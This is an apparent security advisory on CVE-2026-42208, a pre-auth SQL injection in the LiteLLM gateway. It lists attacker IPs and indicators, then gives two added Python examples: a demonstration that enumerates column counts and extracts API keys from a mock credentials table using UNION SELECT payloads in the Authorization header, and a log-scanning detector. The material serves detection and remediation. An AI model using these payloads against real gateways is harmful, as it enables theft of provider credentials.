PT-2026-35643

Published

2026-04-27

·

Updated

2026-04-29

·

CVE-2026-42208


No severity ratings or metrics are available. When they are, we'll update the corresponding info on the page.
A critical pre-auth SQL injection in the LiteLLM AI gateway was exploited within 36 hours of disclosure. The attacker went straight for the tables holding upstream provider credentials and gateway API keys rather than enumerating the database broadly.
Technical details:
• CVE-2026-42208 affects LiteLLM versions 1.81.16 through 1.83.6 and allows arbitrary SELECT queries to be injected through the Authorization header.
• The attacker used sk-litellm' UNION SELECT payloads targeting the litellm_credentials, LiteLLM_VerificationToken and litellm_config tables.
• Exploitation came from 65[.]111[.]27[.]132 and 65[.]111[.]25[.]67 with the user agent Python/3.12 aiohttp/3.9.1.
• The operator showed knowledge of the schema, switching from lowercase to PascalCase table names when queries failed.
Attack methodology:
• Phase 1: direct queries against the three highest-value tables, those holding the OpenAI and Anthropic credentials.
• Phase 2: column-count enumeration with UNION SELECT and a varying number of NULL placeholders (ATT&CK T1190, T1552.001).
• No generic sqlmap signatures: the payloads were deliberate and customized, which suggests prior analysis of the schema.
• IP rotation between phases is consistent with tooling built to evade rate limiting.
DFIR opportunities:
• Web logs showing POST /chat/completions requests whose Authorization header begins with Bearer sk-litellm' (note the single quote after the key prefix).
• Requests containing UNION SELECT or the table names litellm_credentials, LiteLLM_VerificationToken or litellm_config.
• A Python aiohttp user agent combined with any of the SQL injection indicators above.
• Billing anomalies at upstream providers, in particular usage from unexpected IP ranges, which can indicate that stolen provider keys are being replayed.
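To illustrate the mechanism the technical details and attack methodology above describe (a single quote in the bearer token that terminates a string literal, the NULL-placeholder probe that finds the column count, and a UNION SELECT that pulls rows out of a credentials table), here is an added example that is not LiteLLM's code and is not taken from this advisory. It runs against an in-memory SQLite database with an invented schema: the table name LiteLLM_VerificationToken appears on this page, but its columns, the litellm_credentials table layout and all sample rows are assumptions, and the vulnerable lookup is a generic string-splicing anti-pattern shown beside a parameterized version, not the real CVE-2026-42208 code path.

```python
import re
import sqlite3

# Constructed stand-in for a gateway database. "LiteLLM_VerificationToken" is
# named in the write-up; the columns, the credentials table layout and every
# row below are assumptions made for this example.
SCHEMA = """
CREATE TABLE "LiteLLM_VerificationToken" (token TEXT PRIMARY KEY, user_id TEXT, spend REAL);
CREATE TABLE "litellm_credentials" (credential_name TEXT, provider TEXT, api_key TEXT);
INSERT INTO "LiteLLM_VerificationToken" VALUES ('sk-litellm-valid-token', 'alice', 0.0);
INSERT INTO "litellm_credentials" VALUES ('openai-prod', 'openai', 'sk-openai-EXAMPLE');
INSERT INTO "litellm_credentials" VALUES ('anthropic-prod', 'anthropic', 'sk-ant-EXAMPLE');
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def bearer_token(header):
    # Strip the "Bearer " scheme; everything after it is attacker-controlled.
    return header[len("Bearer "):] if header.startswith("Bearer ") else header


def lookup_vulnerable(conn, header):
    # Anti-pattern: the token is spliced into the SQL text, so a quote in the
    # header closes the literal and the rest of the header is executed as SQL.
    token = bearer_token(header)
    query = ('SELECT token, user_id, spend FROM "LiteLLM_VerificationToken" '
             f"WHERE token = '{token}'")
    return conn.execute(query).fetchall()


# Hypothetical key shape: reject anything that is not a plain key before the
# database is touched at all.
TOKEN_RE = re.compile(r"^sk-[A-Za-z0-9_-]{8,}$")


def lookup_hardened(conn, header):
    # Fix: validate the shape, then bind the value as a parameter so the driver
    # never interprets it as SQL.
    token = bearer_token(header)
    if not TOKEN_RE.fullmatch(token):
        return []
    return conn.execute(
        'SELECT token, user_id, spend FROM "LiteLLM_VerificationToken" WHERE token = ?',
        (token,),
    ).fetchall()


def enumerate_column_count(conn, max_cols=8):
    # Phase 2 from the write-up: grow the NULL list until the UNION stops
    # failing with a column-count mismatch. The first n that succeeds is the
    # width of the original SELECT.
    for n in range(1, max_cols + 1):
        payload = "sk-litellm' UNION SELECT " + ",".join(["NULL"] * n) + "--"
        try:
            lookup_vulnerable(conn, "Bearer " + payload)
            return n
        except sqlite3.OperationalError:
            continue
    return None


# Phase 1 shape: once the width is known, UNION in rows from the target table.
EXFIL_PAYLOAD = ("sk-litellm' UNION SELECT credential_name, provider, api_key "
                 "FROM litellm_credentials--")


def exfiltrate_vulnerable(conn):
    return lookup_vulnerable(conn, "Bearer " + EXFIL_PAYLOAD)


def exfiltrate_hardened(conn):
    # Same payload against the parameterized lookup: the format check rejects
    # it, and even without that check the whole string is just a non-matching key.
    return lookup_hardened(conn, "Bearer " + EXFIL_PAYLOAD)


if __name__ == "__main__":
    db = make_db()
    print("column count found:", enumerate_column_count(db))
    print("vulnerable lookup returns:", exfiltrate_vulnerable(db))
    print("hardened lookup returns:", exfiltrate_hardened(db))
```

The column-count probe relies on the database raising an error for a mismatched UNION, which is exactly the signal the NULL-placeholder requests in Phase 2 are after; on a parameterized query the same headers never reach the SQL parser as anything but a literal value.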
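The log indicators above, turned into a small detection script. This is an added example and not part of the advisory: the JSON-lines request log format, its field names and every entry are constructed for the example, and a real gateway would only carry the Authorization value in its logs if configured to do so. The two source IPs, the aiohttp user agent, the sk-litellm' prefix and the table names are the indicators given on this page.

```python
import json
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed request log (JSON lines). The field layout is an assumption for
# this example. Rows 2-6 reproduce the indicator shapes from the write-up;
# rows 1 and 7 are benign traffic, row 7 deliberately from an aiohttp client.
SAMPLE_LOG = """
{"ts":"2026-04-28T09:12:01Z","src":"203.0.113.10","method":"POST","path":"/chat/completions","ua":"curl/8.4.0","auth":"Bearer sk-litellm-abc123"}
{"ts":"2026-04-28T09:14:07Z","src":"65.111.27.132","method":"POST","path":"/chat/completions","ua":"Python/3.12 aiohttp/3.9.1","auth":"Bearer sk-litellm' UNION SELECT NULL--"}
{"ts":"2026-04-28T09:14:08Z","src":"65.111.27.132","method":"POST","path":"/chat/completions","ua":"Python/3.12 aiohttp/3.9.1","auth":"Bearer sk-litellm' UNION SELECT NULL,NULL--"}
{"ts":"2026-04-28T09:14:09Z","src":"65.111.27.132","method":"POST","path":"/chat/completions","ua":"Python/3.12 aiohttp/3.9.1","auth":"Bearer sk-litellm' UNION SELECT NULL,NULL,NULL--"}
{"ts":"2026-04-28T09:15:30Z","src":"65.111.25.67","method":"POST","path":"/chat/completions","ua":"Python/3.12 aiohttp/3.9.1","auth":"Bearer sk-litellm' UNION SELECT credential_name,provider,api_key FROM litellm_credentials--"}
{"ts":"2026-04-28T09:15:31Z","src":"65.111.25.67","method":"POST","path":"/chat/completions","ua":"Python/3.12 aiohttp/3.9.1","auth":"Bearer sk-litellm'%20UNION%20SELECT%20token,user_id,NULL%20FROM%20%22LiteLLM_VerificationToken%22--"}
{"ts":"2026-04-28T09:20:00Z","src":"198.51.100.7","method":"POST","path":"/chat/completions","ua":"Python/3.12 aiohttp/3.9.1","auth":"Bearer sk-litellm-xyz789"}
"""

# Indicators from the write-up.
KNOWN_BAD_IPS = {"65.111.27.132", "65.111.25.67"}
TABLE_NAMES = ("litellm_credentials", "litellm_verificationtoken", "litellm_config")
UNION_RE = re.compile(r"union\s+(?:all\s+)?select", re.I)
# Captures a UNION SELECT whose projection is only NULL placeholders.
NULL_PROBE_RE = re.compile(r"union\s+select\s+((?:null\s*,\s*)*null)", re.I)


def parse_log(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def classify(event):
    """Return the indicator tags that fire on one request; empty means benign."""
    tags = []
    # URL-decode first so %20-encoded payloads do not slip past the patterns.
    auth = unquote(event.get("auth", ""))
    low = auth.lower()
    sqli = False
    if low.startswith("bearer sk-litellm") and "'" in auth:
        tags.append("auth_bearer_quote")
        sqli = True
    if UNION_RE.search(auth):
        tags.append("union_select")
        sqli = True
    for name in TABLE_NAMES:
        if name in low:
            tags.append(f"table:{name}")
            sqli = True
    # The user agent alone is not an indicator; it only adds weight to a hit.
    if sqli and "aiohttp" in event.get("ua", "").lower():
        tags.append("aiohttp_ua_with_sqli")
    if event.get("src") in KNOWN_BAD_IPS:
        tags.append("known_bad_ip")
    return tags


def scan(events):
    """All flagged events paired with their tags."""
    flagged = []
    for ev in events:
        tags = classify(ev)
        if tags:
            flagged.append((ev, tags))
    return flagged


def column_enumeration(events, min_distinct=3):
    """Source IPs that sent NULL-only UNION probes with >= min_distinct widths."""
    widths = defaultdict(set)
    for ev in events:
        m = NULL_PROBE_RE.search(unquote(ev.get("auth", "")))
        if m:
            widths[ev["src"]].add(m.group(1).lower().count("null"))
    return {ip: sorted(w) for ip, w in widths.items() if len(w) >= min_distinct}


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    for ev, tags in scan(evs):
        print(ev["ts"], ev["src"], tags)
    print("column enumeration:", column_enumeration(evs))
```

Two design points worth keeping in a production version of this: decode the header before matching, because the fifth flagged request here only contains the table name and the UNION keyword after percent-decoding, and treat the aiohttp user agent as a weighting factor rather than a rule of its own, since the benign last row shows a legitimate aiohttp client would otherwise be a false positive.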
#DFIR Radar

Related Identifiers

CVE-2026-42208

Affected Products

LiteLLM (versions 1.81.16 through 1.83.6)